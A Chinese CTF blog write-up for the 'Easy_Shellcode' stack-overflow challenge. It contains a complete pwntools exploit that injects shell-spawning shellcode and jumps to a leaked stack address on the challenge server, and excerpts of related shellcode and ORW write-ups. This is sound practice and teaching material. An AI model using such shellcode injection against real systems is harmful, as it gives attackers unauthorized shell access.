easy-shellcode

发表于2025-07-25|更新于2025-07-25|PWN不出来

|浏览量:

类型：shellcode、栈溢出

https://www.qsnctf.com/ 题目叫做：Easy_Shellcode

输入然后栈中执行，一开始的时候会输出v4的地址。

PIE每次会随机地址，但是按照人类逻辑的最前面三位不动。通过0x7ff将后面的值全部获取。再return到这里执行shellcode即可。

exp:

from pwn import *

context(log_level = 'debug', arch = 'amd64', os = 'linux')


ip='challenge.qsnctf.com'
port=34976
file_addr = './easy-shellcode'


p = remote(ip,port)

# p = process(file_addr)
elf = ELF(file_addr)

v4_addr=int(p.recvline()[2:],16)
print(v4_addr)
shellcode = asm(shellcraft.sh())
payload = shellcode
payload += b'\x90'*(0x100-len(shellcode)+8)+p64(v4_addr)
# print(payload)
p.send(payload)
p.interactive()

文章作者: Kanyo

文章链接: http://kanyooooo.github.io/docx/easy-shellcode/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Kanyo’s Blogs！

shellcode PWN的writeup 栈溢出 qxnctf

欢迎打赏！饿饿，饭饭！！

给我来杯咖啡
个人微信

相关推荐

[NewStarCTF 2023 公开赛道]shell code revenge

特殊shellcode https://buuoj.cn/challenges#[NewStarCTF%202023%20%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93]shellcode%20revenge 这道题有点像我之前做过的mrctf的shellcode的revenge。不过范围不一样。大概看一下，把所有的大写字母和数字都排除在外了，意思是只要输入大写字母和数字就不会被break——跳出。所以我们要创造一个只有大写字母和数字的shellcode？然后我也懒得checksec了，而且用的是rsp——也就是64位。开了一些保护啥的，反正jumpout到的66660000h这个地址在上面的mmap里面写入了权限’7’（第三参数），也就是可读可写可执行。整个代码的逻辑是：出现Show me your magic之后，进入一个for循环，for循环一开始会有一个read让我们输入数据，因为是一个char类型指针buf，每次读取一个值。然后下面的strncpy()会把我们一个一个输入的buf存到src里面的src复制到我们的0x6666000...

Shellcode 栈溢出 https://buuoj.cn/challenges#ciscn_2019_s_9 首先checksec一下，看一下大概内容： IDA打开之后，发现有一个后门函数hint，逻辑如下：使用此函数的时候，执行esp里面的内容（使用了jmp），我们不需要这些上面什么乱七八糟的东西，我们只需要.text里面的0x08048554的jmp esp就行了。先记下来这是我们可以利用的漏洞。然后这里是程序唯一一个输入口，也就是说大概率这里有漏洞：他首先可以让我输入32h的内容，不过通过伪C代码（其实汇编也能看到），这个字符串的长度只有24。也就是说可以构造栈溢出，这个就很简单了。那么我现在构造含有shellcode这样的一个payload：所以说，大概代码如下： 12345678910111213141516171819202122from pwn import*context(log_level = 'debug', arch = 'i386', os = 'linux')p = re...

mrctf2020_shellcode

类型：pwn、shellcode https://buuoj.cn/challenges#mrctf2020_shellcode 首先检查文件大概了解情况之后，根据题目标题，我大概知道是shellcode，然后打开IDA查看一下代码长啥样。一整个流程是这样的，然后F5也没有办法正常反编译成伪C。整个使用流程大概如此。再回到汇编，在输出之后可以让我读取值。因为call了read函数 123456#include <unistd.h>ssize_t read(int fd, void *buf, size_t count);//其中，fd是文件描述符//buf是指向数据将被读取的缓冲区的指针//而count是期望读取的字节数//当调用read函数时，它会尝试从fd指向的文件中读取count个字节的数据到buf所指向的内存中。如果读取成功，函数返回实际读取到的字节数；如果读取到文件末尾或没有可读取的数据，函数返回0；如果发生错误，则返回-1，并将错误代码存入errno中。这边题目给了不少备注，在程序的一开始用了一个buf什么-410h，这个就是rb...

mrctf2020_shellcode_revenge

类型：shellcode 字符审查 https://buuoj.cn/challenges#mrctf2020_shellcode 一如既往的checksec 打开ida之后我们发现图形化反汇编mian函数里面有很多的跳转。我们直接F5，会报错，说call rax这一行有问题。我们直接右键未定义即可。看起来是一堆if字符检测，我们拿出离散数学的知识和ASCII码表对照一看就会快速发现这是一个把所有的非字母、非数字常规文本字符给去掉了。只有“qwertyuiopasdfghjklzxcvbnm QWERTYUIOPASDFGHJKLZXCV BNM 1234567890”这些字符。然后原理和mrctf2020_shellcode一样，读入什么执行什么。我们可以用alpha3工具来帮我们生成这个shellcode：alpha3.py ok了，然后我们就得到64位的shellcode字符串化的串为： 1Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2O2u2E0Z7m0n7m0R0b2x2o0Y102...

pwnable_orw【有问题】

Shellcode、ORW https://buuoj.cn/challenges#pwnable_orw 首先checksec 32位系统下，栈可执行，有金丝雀。看一下代码：代码相当简单，有一个seccomp的初始化，然后read了一个shellcode（字符串），然后以shellcode字符串的地址直接在栈上执行。根据题目叫做pwn able orw，也就是一道考察ORW syscall的题目。查看一下seccomp启用呢？启用了open、read、write和exit，还有一个什么sigreturn和rt_sigreturn，和一个架构。之前写过类似的题目，详细记录在这：shellcode1_dahuan02 不过这个是32位系统的，我们按照32位做一个ORWshellcode就可以了 1234567891011121314151617181920212223242526272829303132333435from pwn import *# r = process("./orw")r = process('./orw...

shellcode1_dahuan02

Shellcode、ORW 依旧是大欢老师给的shellcode题目。 checksec一下，里面大概是这样的。一些保护其实可以通过逆向后的代码看出来。不过我们依旧按照正常流程走一遍就好了，也花不了什么时间，就是大概了解一下。直接看代码：我们在编译main函数的时候会触发一个问题，他说这个0x40133B这一行（也就是call rdx）这里有问题。我们先看一下这几句话吧。这边大概可以看到，在read函数之后，程序有一个jle指令（jle是jump if less or equal，小于等于时候跳转），也就是跳转。跳转到下面之后会报一个stack_chk_fail的错误，也就是什么栈检测报错。反正我们就把它当作一个栈保护就行了，也就是说我们最好不要跳转。再回到上面报错的这一行，是一个call rdx…也就是执行rdx里面的内容。怪不得报错呢，因为这一行直接执行相当于一个call指令，但是没有call任何的函数，而是一个寄存器，所以我们没有办法把他反编译成伪C里面的“调用了什么函数”如此这般的写法。所以我们选中这一句call rdx，右键给他暂时不反编译就好了：...

数据加载中